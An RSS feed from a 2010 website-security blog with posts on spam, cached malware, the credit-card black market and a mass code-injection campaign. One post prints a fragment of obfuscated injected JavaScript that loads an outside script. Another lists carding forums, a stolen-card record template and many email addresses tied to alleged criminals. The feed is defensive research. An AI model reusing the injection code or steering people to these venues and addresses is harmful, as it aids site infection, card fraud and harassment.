<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>stopthehacker.com</title>
	<atom:link href="http://www.stopthehacker.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.stopthehacker.com</link>
	<description>Jaal, LLC</description>
	<lastBuildDate>Tue, 09 Mar 2010 18:05:26 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Popular Websites Host More Spam</title>
		<link>http://www.stopthehacker.com/2010/03/09/more-popular-websites-host-more-spam/</link>
		<comments>http://www.stopthehacker.com/2010/03/09/more-popular-websites-host-more-spam/#comments</comments>
		<pubDate>Tue, 09 Mar 2010 18:05:26 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[alexa]]></category>
		<category><![CDATA[online pharmacy spam]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[top]]></category>
		<category><![CDATA[websites]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1464</guid>
		<description><![CDATA[Popular Internet websites are a good place to advertise and therefore a target for spammers. Large throngs of visitors who view content on popular sites are the main draw. Spammers use vulnerabilities in message boards and forums to insert spam advertisements.
This &#8220;malvertising&#8221; is bad for the reputation of the website in question and because it [...]]]></description>
			<content:encoded><![CDATA[<p>Popular Internet websites are a good place to advertise and therefore a target for spammers. Large throngs of visitors who view content on popular sites are the main draw. Spammers use vulnerabilities in message boards and forums to insert spam advertisements.</p>
<p>This &#8220;malvertising&#8221; is bad for the reputation of the website in question and because it opens up a Pandora&#8217;s box of security issues if a visitor decides to follow the link in the advertisement. In this short article we try to determine if certain subsets of the most popular 1 million Internet websites are more vulnerable to attack by spammers.</p>
<p><strong>Experiment Goals</strong></p>
<ul>
<li>Where are the spammers targeting their efforts?</li>
<li>What kind of websites need to put more effort into stopping spammers?</li>
</ul>
<p><strong>Methodology</strong></p>
<p>We obtained a list of the top 1 million websites from <a href="http://www.alexa.com" target="_blank">Alexa</a>. We partitioned the list into 3 equal parts, designated as &#8220;top,&#8221; &#8220;middle&#8221; and &#8220;low&#8221; websites. From each subset, we randomly selected 1000 websites and determined if they were hosting spam advertisements.</p>
<p>To determine whether a site was hosting spam advertisements, we queried <a href="http://www.google.com" target="_blank">Google</a> and other search engines with a list of keywords suggesting pharmacy spam (e.g. &#8220;buy Kamagra cheap&#8221; and &#8220;no prescription needed&#8221;). Once a website was found to include spam advertisements, the suspect pages from that website were downloaded to ensure that spam advertisements were indeed present.</p>
<p><strong>Interesting Results</strong></p>
<ul>
<li>The &#8220;top&#8221; tier was responsible for 9% of sites hosting spam ads.</li>
<li>The &#8220;middle&#8221; tier was responsible for 4% of sites hosting spam ads.</li>
<li>The &#8220;low&#8221; tier was responsible for 3% of sites hosting spam ads.</li>
</ul>
<p><strong>Conclusion</strong></p>
<p>It is surprising to see that &#8220;top&#8221; ranking websites were more than twice as likely to have spam advertisements on their web pages than &#8220;middle&#8221; or &#8220;low&#8221; ranking websites.</p>
<p>It could be that spammers prefer to concentrate on the most popular sites versus the not-so-popular ones or that popular sites have more discussion/message boards that can be exploited. This question could be the basis of a more in-depth study of this phenomenon.<br />
<span id="more-1464"></span><br />
<strong>Examples of websites that host spam advertisements</strong></p>
<p>Top sites:</p>
<pre class="brush: plain;">
www.pcd.go.th
www.blognone.com
www.howardforums.com
www.memeq.net
www.adrants.com
</pre>
<p>Middle sites:</p>
<pre class="brush: plain;">
www.rankarthai.com
www.pmg.org.za
</pre>
<p>Low sites:</p>
<pre class="brush: plain;">
www.nailshop.ro
www.simple-momreviews.com
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/09/more-popular-websites-host-more-spam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Yes, Search Engines Can Infect Your Computer</title>
		<link>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/</link>
		<comments>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/#comments</comments>
		<pubDate>Mon, 08 Mar 2010 17:00:27 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bing]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[engine]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[pages]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[yahoo]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1472</guid>
		<description><![CDATA[Search engines, like Google, Yahoo and Bing offer users the ability to scour the plethora of information on the Internet. These search engines index content on websites and often maintain cached copies of these sites so that, in the event that the site is unavailable, visitors can still view the contents of the website.
Unfortunately, the [...]]]></description>
			<content:encoded><![CDATA[<p>Search engines, like <a href="http://www.google.com" target="_blank">Google</a>, <a href="http://search.yahoo.com" target="_blank">Yahoo</a> and <a href="http://www.bing.com" target="_blank">Bing</a> offer users the ability to scour the plethora of information on the Internet. These search engines index content on websites and often maintain cached copies of these sites so that, in the event that the site is unavailable, visitors can still view the contents of the website.</p>
<p>Unfortunately, the idea of page caching has not been implemented well. In fact, page caching has opened up new opportunities for malware. The primary problem being that, from a security perspective, when search engines cache copies of websites, they are storing any malware that is present on the site on their own infrastructure as well.</p>
<h3>Hackers Exploit Search Engine Page Caches</h3>
<p>Most large search engines use some kind of malware analysis to determine if a website is compromised or not. Google for example, has a well tuned system with high accuracy. In our meeting with the Google malware team, some months ago, we were glad to find that they were already aware of this problem. In the weeks following our interaction, cached copies of infected websites were no longer easily available via searches.</p>
<p>Not so long ago, we wrote an article about <a href="http://www.stopthehacker.com/2009/11/25/yahoo-hosting-malware-are-you-serious/" target="_blank">our efforts to alert Yahoo</a> of the presence of malware in the cached versions of various web pages served up by their search engine. Our efforts were not successful, although the occurrence of malware in Yahoo cached pages seems to have gone down significantly. Perhaps our messages were not entirely ignored.</p>
<p>Recently, an article came up on <a href="http://isc.sans.org/diary.html?storyid=7768&amp;" target="_blank">ISC SANS</a> discussing this very same issue.</p>
<p>Recently, we have found instances of Bing serving up malware in their cached pages. It seems that Bing&#8217;s malware detection methods are not able to reliably detect malware on cached web pages. This keeps Bing from securing cached pages which contain malware for its users. We have provided screen shots below as an example of the issue. In this particular case, the strain of malware found in Bing cached pages has been around since 2009.</p>
<h3>Search Engines Ignore the Problem</h3>
<p>Consider the case where a malicious individual deliberately infects a website with malware and Bing (or another search engine) indexes it. The malicious individual can then send out hyperlinks pointing to the cached web pages hosted by Bing. Any kind of &#8220;reputation-checking&#8221; for the cached link will confirm that the page is hosted by a reputable company, in this case, Bing (Microsoft). However, the malware will still be able to deliver its payload. Just in case you&#8217;re thinking, &#8220;my antivirus will protect me from the malware on the cached page,&#8221; you may like to <a href="http://www.stopthehacker.com/2009/12/11/catch-me-if-you-can-antivirus-poor-at-detecting-web-malware/" target="_blank">read this article</a>.</p>
<p>It is surprising to see that search engines like Bing, which claim to implement malware detection, cannot correctly determine if a cached copy of a web page hosts malware! In these cases, Bing ends up an excellent attack vector for malicious individual.</p>
<p>It remains to be seen if search engine companies will continue to serve up cached pages laced with malware at the same time as they are touting active scan and detection mechanisms. Let&#8217;s hope this article can get attention in the upper echelons of management at these large search giants and they start to pay attention to this problem.</p>
<p><strong>Screen shots follow below:</strong></p>

<a href='http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/bing_cache_malware_1/' title='Cache page served up Bing: contains Malware'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2010/03/bing_cache_malware_1-150x150.jpg" class="attachment-thumbnail" alt="" title="Cache page served up Bing: contains Malware" /></a>
<a href='http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/malware/' title='Malware in source code of cached page served by Bing'><img width="150" height="150" src="http://www.stopthehacker.com/wp-content/uploads/2010/03/malware-150x150.png" class="attachment-thumbnail" alt="" title="Malware in source code of cached page served by Bing" /></a>

]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/08/can-search-engines-infect-your-computer-yes/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The &#8220;Underground&#8221; Credit Card Blackmarket</title>
		<link>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/</link>
		<comments>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 17:10:10 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blackmarket]]></category>
		<category><![CDATA[card skimming]]></category>
		<category><![CDATA[credit card]]></category>
		<category><![CDATA[cvv]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1420</guid>
		<description><![CDATA[Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of TJX Companies (owner of T.J. Maxx) and Heartland Payment Systems show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate [...]]]></description>
			<content:encoded><![CDATA[<p>Credit card data has been traded on the cyber black-market for a number of years. The relatively recent breaches of <a href="http://news.cnet.com/8301-1009_3-10320761-83.html" target="_blank">TJX Companies</a> (owner of T.J. Maxx) and <a href="http://www.msnbc.msn.com/id/28758856/" target="_blank">Heartland Payment Systems</a> show the extent to which criminals will go in order to harvest credit card numbers, social security numbers, names, addresses and more. All this legitimate (but stolen) information fuels a world of cyber crime.</p>
<p>In this article we show that, unlike what you might think, the credit card black-market operates very much in the open. Below we point out websites, which can be used to tap into the cyber black-market and find stolen credit card numbers and the associated credentials to purchase for any purpose they desire. We also show instant messenger handles, emails and details of what cyber criminals are selling on the Internet.</p>
<p>We analyzed 429 unique domains and 615 unique URLs. Each of these URLs contained information about buying stolen credit card information. Each URL lead to a web page where cyber-criminals have posted details about how to interact with them and buy stolen financial credentials. In the majority of cases, cyber criminals who are selling this information can provide one of the following types of data.</p>
<p>The data for this article was collected between February 27th and March 2nd, 2010.</p>
<p><strong>Basic Credit Card Information Offers:</strong></p>
<p>Usually consists of credit card number, type, expiration date and CVV.</p>
<pre class="brush: plain;">USA &amp; CANADA CCV2

VISA/Mastercard ~ 2USD/each
AmEX/Discover   ~ 4 USD/each

UK &amp; WU CVV2

VISA/Mastercard ~ 3USD/each
AmEx/Discover   ~ 5USD/each
</pre>
<p><strong>Premium Credit Card Information Offers:</strong></p>
<p>Usually consists of credit card number, type, expiration date, CVV, SSN, Home Address, Full Name, Date of Birth and much more.</p>
<pre class="brush: plain;">USA &amp; CANADA CCV2

VISA/Mastercard ~ $35/each

UK &amp; EU

VISA/Mastercard ~ $40/each

ACCOUNT INFORMATION:
First Name: xxxxx
Last Name: xxxxx
Address: xxxxx xxxxx xxxxx xxxxx
Apt:
City: Homestaed
State: FL
Zip: xxxxx
Home Phone: (xxxxx)xxxxx-xxxxx
Work Phone: (xxxxx)xxxxx-xxxxx
Email: xxxxx@yahoo.com
SSN: xxxxx-xxxxx-xxxxx
License Number: xxxxx-xxxxx-xxxxx-xxxxx-xxxxx
License State: FL
DOB: 09/xxxxx/xxxxx

PAYMENT INFORMATION:
Credit Card Type: VISA
Number: xxxxxxxxxxxxxxx
CCV: 889
Expiration Date: 11/2008
Name: xxxxx xxxxx
Card Name First: xxxxx
Card Name Last: xxxxx
</pre>
<p><strong>PayPal Information Offers:</strong></p>
<pre class="brush: plain;">
Verified account                 ~ 20USD/each
Verified account with email pin  ~ 25USD/each
Verified acccount with full info ~ 35USD/each
unverified account               ~ 10USD/each
</pre>
<p>Some domains host multiple instances of stolen Credit Card Ads, (CC-Ads). We present the frequency distribution of CC-Ads on each unique domain below.</p>
<div id="attachment_1445" class="wp-caption aligncenter" style="width: 360px"><img class="size-full wp-image-1445" title="Frequency of CC-Ads on each unique domain." src="http://www.stopthehacker.com/wp-content/uploads/2010/03/blackmarket_sites_freq.jpeg" alt="Frequency of CC-Ads on each unique domain." width="350" height="321" /><p class="wp-caption-text">Frequency of CC-Ads on each unique domain.</p></div>
<p><strong>Interesting Highlights:</strong></p>
<ul>
<li>None of the websites advertising stolen credit card data were blacklisted by Google&#8217;s Safe Browsing List. This could potentially indicate that cyber criminals are conscientious of not discouraging visitors to these sites.</li>
<li>Cyber criminals prefer to get paid via <a href="http://www.libertyreserve.com/" target="_blank">Liberty Reserve</a> and <a href="http://www.westernunion.com/" target="_blank">Western Union</a> money transfer services.</li>
<li>Some cyber criminals have used images to provide quotations <a href="http://img144.imageshack.us/img144/2327/baseundocked2.jpg" target="_blank">[img]</a>.</li>
<li>Yahoo.com seems to be the email and instant messaging service preferred by cyber criminals.</li>
<li>Nearly 75% of sites with CC-Ads are located in the US (see graph below).</li>
</ul>
<div id="attachment_1444" class="wp-caption aligncenter" style="width: 291px"><img class="size-full wp-image-1444" title="IP Geo-location for websites with CC-Ads." src="http://www.stopthehacker.com/wp-content/uploads/2010/03/blackmarket_sites_location.jpeg" alt="IP Geo-location for websites with CC-Ads." width="281" height="229" /><p class="wp-caption-text">IP Geo-location for websites with CC-Ads.</p></div>
<p><strong>Conclusion:</strong></p>
<p>It is clear from the current state of the credit card black-market that cyber criminals can operate much too easily on the Internet. They are not afraid to put out their email addresses, in some cases phone numbers and other credentials in their advertisements. It seems that the black market for cyber criminals is not underground at all. In fact, it&#8217;s very &#8220;in your face.&#8221; Clearly a more concerted effort is required to clamp down on this problem. Simply tying up loose ends on the enterprise side is not enough to combat this problem when there is virtually nothing to stop criminals from touting their stolen wares freely in the Internet.<br />
<span id="more-1420"></span><br />
<em>Editor&#8217;s Note: We are providing a limited list of sites as an example of the brash lawbreaking behavior of these cyber criminals. We believe it is important for the purpose of this article that the reader be able to verify our statements. Additionally, we believe that consumer awareness of the problem can only serve to reduce the ease with which these criminals operate.</em></p>
<p><strong>Forums used to buy and sell stolen credit card information:</strong></p>
<pre class="brush: plain;">
*hxxp://ghostmarket.net
*hxxp://gayatheists.2.forumer.com
*hxxp://www.pakbugs.com/sell
*hxxp://forums.lava-carding.com
*hxxp://www.offcarding.forums-free.com
*hxxp://hack0rz.forums-free.com
*hxxps://security-shell.ws
*hxxp://silverspam.net
*hxxp://sellcvv2.forums-actifs.com
</pre>
<p><strong>Various instant messenger credentials <a href="http://abbeville-louisiana.olx.com/cc-fullinfo-fresh-and-paypal-login-for-sale-iid-6281088" target="_blank">[1]</a> <a href="http://www.adguru.org/stock-market-f39-sell-cvv-fresh-cheap-t61131.html" target="_blank">[2]</a> <a href="http://www.aewebworks.com/aff/forum/topic58.html" target="_blank">[3]</a> used by cyber criminals:</strong></p>
<p>People who interacted with &#8220;ubuntu_kana&#8221; (Yahoo messenger):</p>
<ul>
<li>ahmadshrief11@yahoo.com, davidlindon1@gmail.com, frankykkk@yahoo.com, suzannasuro@gmail.com, alexgenieve@hotmail.com, dave3331@gmail.com, ccvhack21@yahoo.com, trungtuyen68@yahoo.com, XUAN_CCS@YAHOO.COM, niklasjulius@rocketmail.com, boy_magnanimous@yahoo.com, FRESH_HACK2002@YAHOO.COM, vic.sell@yahoo.com</li>
</ul>
<p>People who interacted with &#8220;peeseller&#8221; (Yahoo messenger):</p>
<ul>
<li>aloopapa@yahoo.com, dumpsfresh@yahoo.com, ug.tsunami@yahoo.com, sellrep@yahoo.com,</li>
</ul>
<p>People who interacted with &#8220;bagiabancc&#8221; (Yahoo messenger):</p>
<ul>
<li>WorkusaJob@yahoo.com, david_cuong_85@yahoo.com, salulynho@yahoo.com, vang_kiban@yahoo.com, pro.cv2er@gmail.com, pro.cv2er@hotmail.com</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/03/the-underground-credit-card-blackmarket/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Virus Infects 13 Million PCs, Steals Credit Card Numbers</title>
		<link>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/</link>
		<comments>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/#comments</comments>
		<pubDate>Wed, 03 Mar 2010 03:50:38 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bot-net]]></category>
		<category><![CDATA[credit card]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[malicious websites]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[Mariposa]]></category>
		<category><![CDATA[raid]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1456</guid>
		<description><![CDATA[&#8220;Spain Busts Hackers for Infecting 13 Million PCs&#8221;

Reuters via Threat Level &#124; Wired.com

Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the &#8220;largest cyber-raid to date&#8221; are just being [...]]]></description>
			<content:encoded><![CDATA[<p>&#8220;Spain Busts Hackers for Infecting 13 Million PCs&#8221;</p>
<ul>
<li>Reuters via <a href="http://www.wired.com/threatlevel/2010/03/spain-busts-hackers-for-infecting-13-million-pcs/">Threat Level | Wired.com</a></li>
</ul>
<p>Users were targeted via a vulnerability in Internet Explorer when they visited websites infected with the malware. Spanish authorities shutdown the Mariposa bot-net on December 23, 2009 although the details of what is being called the &#8220;largest cyber-raid to date&#8221; are just being released.</p>
<p>Infection Statistics:</p>
<ul>
<li>190 countries</li>
<li>40 of the largest financial institutions</li>
<li>50% of 1,000 largest companies</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/02/virus-infects-13-million-pcs-steals-credit-card-numbers/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Zero to 3000+ Infected Sites in Less Than 30 Minutes</title>
		<link>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/</link>
		<comments>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/#comments</comments>
		<pubDate>Mon, 01 Mar 2010 19:00:48 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[blacklisted websites]]></category>
		<category><![CDATA[code injection]]></category>
		<category><![CDATA[infected sites]]></category>
		<category><![CDATA[malicious websites]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1402</guid>
		<description><![CDATA[Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to Google&#8217;s Safe Browsing List (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.
Malicious hackers don&#8217;t care if the website they infect is a small mom and pop operation or [...]]]></description>
			<content:encoded><![CDATA[<p>Code injection attacks show no signs of abating. Everyday more than 6000 new websites are added to <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a> (blacklist). Hackers are compromising websites without the knowledge of the website owner to, in turn, infect website visitors.</p>
<p>Malicious hackers don&#8217;t care if the website they infect is a small mom and pop operation or a large e-business. They use automated &#8220;bots&#8221; in most cases, which will attack any and every website they can exploit. No website is off limits.</p>
<p>As an example of the rampant nature of this problem, we will show how we found over 3000 infected websites out of which only a small percentage seems to be blacklisted by current website reputation services. One of the most reliable reputation services, offered by Google, only managed to identify a small portion of the whole of the infected websites we mined using Google&#8217;s own search results. Identifying infected websites is not trivial.</p>
<p><strong>We recently saw a strong rise in the appearance of the malicious code below:</strong></p>
<pre class="brush: jscript;">
this.v=&quot;&quot;;:LineMixer [var i=15492;var y=window;var  o='';var op='';
var a='s*c*r:iVpTt:'.replace(/[\:

TVJ\*]/g, '');var  yx=new Array();
var u='c*r*eja_tjeYE_lYe*mYebn*t_'.replace(/[_\*bjY]/g,  '');
var _=new Array();this.nt=&quot;&quot;;]var k;if(k!='dh' &amp;&amp; k !=  '')
{k=null};y.onload=function(){var w;if(w!='' &amp;&amp;  w!='ns'){w=null};
try {this.n_=false;uh=document[u](a);var ow=&quot;&quot;;var  f=&quot;&quot;;
var xl=new String();var xf=&quot;xf&quot;;:LineMixer  [uh['s;rpcp'.replace(/[p;t6O]/g, '')]
='hHt4tVp4:5/V/4e4x4aHmViVnVe4
</pre>
<p>By searching for a small part of the above portion of this code on Google (shown below), we found a list of websites which harbor the above code. A simple mention of this code on the pages of a website does not necessarily imply that the website is bad. It could be that a website administrator was asking for clarification on help forum. However, a detailed (automated) examination is performed by our systems to remove any doubt.</p>
<pre class="brush: jscript;">
this.v=&quot;&quot;;:LineMixer [var i=
</pre>
<p>Interestingly, only 5.7% of the 3000+ infected sites we found exploited with this code were blacklisted by Google. This highlights the fact that even reliable blacklists, like the <a href="http://www.google.com/tools/firefox/safebrowsing/" target="_blank">Google&#8217;s Safe Browsing List</a> are not complete.</p>
<p>Till next time.<br />
<span id="more-1402"></span><br />
<strong>We show a small sample of the 3000+ infected websites below:</strong></p>
<pre class="brush: plain;">
hxxp://saipanlawyer.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.citydusk.com/          (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://de.pastebin.ca/1798028/    (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://www.hotel-ederhof.com/     (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
hxxp://fast-weight-loss-plan.org/ (Not blacklisted, Mon Mar 1 10:19:34 PST 2010)
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/03/01/zero-to-3000-infected-sites-in-less-than-30-minutes/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Do Government Websites Care About HTTPS?</title>
		<link>http://www.stopthehacker.com/2010/02/25/government-sites-care-about-https-not-really/</link>
		<comments>http://www.stopthehacker.com/2010/02/25/government-sites-care-about-https-not-really/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 19:59:52 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[.gov]]></category>
		<category><![CDATA[https]]></category>
		<category><![CDATA[SSL]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1381</guid>
		<description><![CDATA[Government websites play a critical role in the transfer of information to citizens, visitors, businessmen and others throughout their lives. Most importantly many people trust government websites implicitly. By virtue of this immense trust placed in websites which are relied on for information dissemination and collection by the government, one would expect that something as [...]]]></description>
			<content:encoded><![CDATA[<p>Government websites play a critical role in the transfer of information to citizens, visitors, businessmen and others throughout their lives. Most importantly many people trust government websites implicitly. By virtue of this immense trust placed in websites which are relied on for information dissemination and collection by the government, one would expect that something as basic as SSL authentication (via certificates) would be in use by these websites to prove unambiguously to visitors that they are really connecting to the website they expect.</p>
<p>Consider the fact that malicious individuals and organizations have already targeted government organizations including the FDIC, IRS, FBI and many more with success. The government response trying to educate the masses can be found in many places. <a href="http://www.fdic.gov/consumers/consumer/alerts/phishing.html" target="_blank">[1]</a> <a href="http://www.fbi.gov/cyberinvest/escams.htm" target="_blank">[2]</a> <a href="http://www.ic3.gov/default.aspx" target="_blank">[3]</a></p>
<p><strong>The goal of this experiment:</strong></p>
<ul>
<li>To determine whether government sites provide authentication information using HTTPS.</li>
<li>To identify characteristics of government websites using or not using HTTPS.</li>
</ul>
<p><strong>Experiment methodology:</strong></p>
<p>An initial corpus of 150 government websites was mined (via <a href="http://www.usa.gov/Agencies/Federal/All_Agencies/index.shtml" target="_blank">USA.gov</a>). Each website was tested for three signs that indicate whether they employ any authentication mechanism to prove their identity to a visitor.</p>
<p>This experiment was conducted between February 24th and February 25th, 2010.</p>
<p><strong>The three points are listed below:</strong></p>
<ol>
<li>Does the website offer a SSL connection secured by a certificate?
<ul>
<li>If it does, we identify the issuer and the expiration date.</li>
</ul>
</li>
<li>Does the website respond to the HTTPS request within 60 seconds?
<ul>
<li>If it does not, we identify the server as mis-configured.</li>
</ul>
</li>
<li>Does the website seem to have pages, which have an &#8220;https://&#8221; in the URL?
<ul>
<li>We find these pages as indexed by Google (e.g. https://secure.site.gov/login.asp).</li>
</ul>
</li>
</ol>
<p><strong>We present the most interesting results here:</strong></p>
<ul>
<li>Only 53% of government sites offer an SSL certificate to prove their identity.<br />
<em>Note: The certificates for these sites will not expire in less than 30 days.</em></li>
<li>Approximately 6% of government sites have self-signed SSL certificates or certificates signed by authorities which are not widely recognized.<br />
<em>Note: Accessing these websites via a modern browser will cause a warning message to be displayed.</em></li>
<li>Approximately 13% of government sites use expired SSL certificates to prove their identity.</li>
<li>Approximately 1% of government sites have credentials which will expire in less than 30 days.</li>
<li>A whopping 33% of government sites with HTTPS are mis-configured. However, they work fine with HTTP.</li>
</ul>
<div id="attachment_1388" class="wp-caption aligncenter" style="width: 445px"><img class="size-full wp-image-1388" title="Significant numbers of government websites are not using authentication mechanisms effectively." src="http://www.stopthehacker.com/wp-content/uploads/2010/02/govt-https.jpeg" alt="Significant numbers of government websites are not using authentication mechanisms effectively." width="435" height="307" /><p class="wp-caption-text">Significant numbers of government websites are not using authentication mechanisms effectively.</p></div>
<p><strong>Conclusion:</strong></p>
<p>This limited experiment shows that websites operated by the government have a long way to go in terms of proving their identity to end users. These issues should not be treated lightly as they provide impetus to malicious individuals to develop phishing scams targeting government owned infrastructure.</p>
<p><em>Note: Due to the sensitive nature of this information we will not disclose specific government sites with security issues.</em></p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/25/government-sites-care-about-https-not-really/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>stopthehacker.com Attends Technology Forum</title>
		<link>http://www.stopthehacker.com/2010/02/22/stopthehacker-com-attends-technology-forum/</link>
		<comments>http://www.stopthehacker.com/2010/02/22/stopthehacker-com-attends-technology-forum/#comments</comments>
		<pubDate>Tue, 23 Feb 2010 01:06:15 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Company]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Innovation Accelerator]]></category>
		<category><![CDATA[Peter Kiewit Institute]]></category>
		<category><![CDATA[Scott Tech Center]]></category>
		<category><![CDATA[Silicon Prairie News]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1374</guid>
		<description><![CDATA[The stopthehacker.com team traveled to Omaha, Nebraska, in early February to meet with other cyber security companies and corporate, academic and government leaders. Anirban Banerjee, stopthehacker.com co-founder, appeared in a video interview conducted by Jeff Slobotski of the Silicon Prairie News.
Watch Anirban describe the goals of stopthehacker.com:

Scott Tech Center &#038; Innovation Accelerator Host Cyber Security [...]]]></description>
			<content:encoded><![CDATA[<p>The stopthehacker.com team traveled to Omaha, Nebraska, in early February to meet with other cyber security companies and corporate, academic and government leaders. Anirban Banerjee, stopthehacker.com co-founder, appeared in a video interview conducted by <a href="http://www.siliconprairienews.com/contributors/jeff-slobotski">Jeff Slobotski</a> of the <a href="http://www.siliconprairienews.com/">Silicon Prairie News</a>.</p>
<p>Watch Anirban describe the goals of stopthehacker.com:</p>
<ul>
<li><a href="http://www.siliconprairienews.com/2010/02/scott-tech-center-innovation-accelerator-host-cyber-security-event">Scott Tech Center &#038; Innovation Accelerator Host Cyber Security Event</a></li>
</ul>
<p>Thanks again to the <a href="http://www.siliconprairienews.com/">Silicon Prairie News</a> for covering us at the event!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.stopthehacker.com/2010/02/22/stopthehacker-com-attends-technology-forum/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The Curse of the URL Shorteners: How Safe Are They?</title>
		<link>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/</link>
		<comments>http://www.stopthehacker.com/2010/02/19/analyzing-url-shorteners/#comments</comments>
		<pubDate>Fri, 19 Feb 2010 17:00:57 +0000</pubDate>
		<dc:creator>anirban</dc:creator>
				<category><![CDATA[News]]></category>
		<category><![CDATA[Report]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[bit.ly]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[ow.ly]]></category>
		<category><![CDATA[tinyurl]]></category>
		<category><![CDATA[url shorteners]]></category>

		<guid isPermaLink="false">http://www.stopthehacker.com/?p=1130</guid>
		<description><![CDATA[URL shortening services have become all the rage on the Internet. These services take a long URL as input and produce a short, easy to use, URL as an output. Simple! By virtue of their ease of use, millions of Internet surfers use them to post messages on twitter. In fact, URL Shortening services like [...]]]></description>
